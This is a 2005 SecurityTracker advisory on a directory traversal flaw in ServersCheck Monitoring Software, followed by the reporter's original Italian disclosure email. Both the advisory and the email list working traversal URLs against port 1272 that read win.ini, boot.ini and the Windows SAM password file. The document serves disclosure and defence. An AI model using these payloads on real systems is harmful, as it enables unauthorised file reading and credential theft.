[Vendor Disputes Impact] ServersCheck Lets Remote Authenticated Users Traverse the Directory
|
|
SecurityTracker Alert ID: 1014075
|
|
SecurityTracker URL: http://securitytracker.com/id?1014075
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Jun 3 2005
|
Original Entry Date: May 29 2005
|
Impact: Disclosure of system information, Disclosure of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 5.9.0 - 5.10.0
|
Description: rgod reported an input validation vulnerability in ServersCheck. A remote authenticated user can view files on the target system. [Editor's note: The vendor has disputed the security impact of this issue.]
The ServersCheck Monitoring Software does not properly validate user-supplied requests. A remote authenticated user can supply a
specially crafted URL containing directory traversal characters to view files on the target system.
Some demonstration exploit
URLs are provided:
http://[target]:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://[target]:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boo
t.ini
http://[target]:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://[target]:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://[target]:1272/../../
../../../../../../../boot.ini
http://[target]:1272/../../../../../../../../boot.ini
http://[target]:1272/../../../../boot.ini
[Editor's
note: The vendor has disputed the security impact of this bug. The vendor confirms the system behavior and has issued a fix, but
notes that the single user of the administrative interface has system administration privileges on the underlying operating system
and can view or modify the files that are disclosed via the directory traversal bug. We are reviewing the matter and will update
this alert shortly.]
|
Impact: A remote authenticated user can view files on the target system.
[Editor's note: The vendor has indicated that the only remote
authenticated user is a person who will also have system administrator privileges at the operating system level on the target system.]
|
Solution: The vendor has issued a fixed version (5.10.1).
|
Vendor URL: www.serverscheck.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Windows (2000), Windows (2003), Windows (XP)
|
Reported By: <retrogod@aliceposta.it>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 29 May 2005 11:33:08 +0200
From: <retrogod@aliceposta.it>
Subject: serverscheck 5.9 trasversal url bug
|
*******************************************
Serverscheck trasversal url bug
by rgod at http://rgod.altervista.org
26-05-2005
******************************************
-sito del produttore:
www.serverscheck.com
-versione testata:
Serverscheck Monitoring Software 5.9.0 - 5.10.0
-descrizione del prodotto:
"ServersCheck is a network monitoring, reporting and alerting tool.
It monitors the availability of networked devices and computer systems
(Windows, Unix, Linux, MacOS,...). ServersCheck runs on Windows 2000, 2003
and
XP"
-vulnerabilità:
directory trasversal bug - permette a un utente definito dall'amministratore
di navigare all'interno della macchina e procurarsi file di password,
informazioni riservate. Al momento non è disponibile alcuna patch.
-exploit:
alcuni check con esito positivo:
http://localhost:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://localhost:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boo
t.ini
http://localhost:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://localhost:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://localhost:1272/../../../../../../../../../boot.ini
http://localhost:1272/../../../../../../../../boot.ini
http://localhost:1272/../../../../boot.ini
|
|
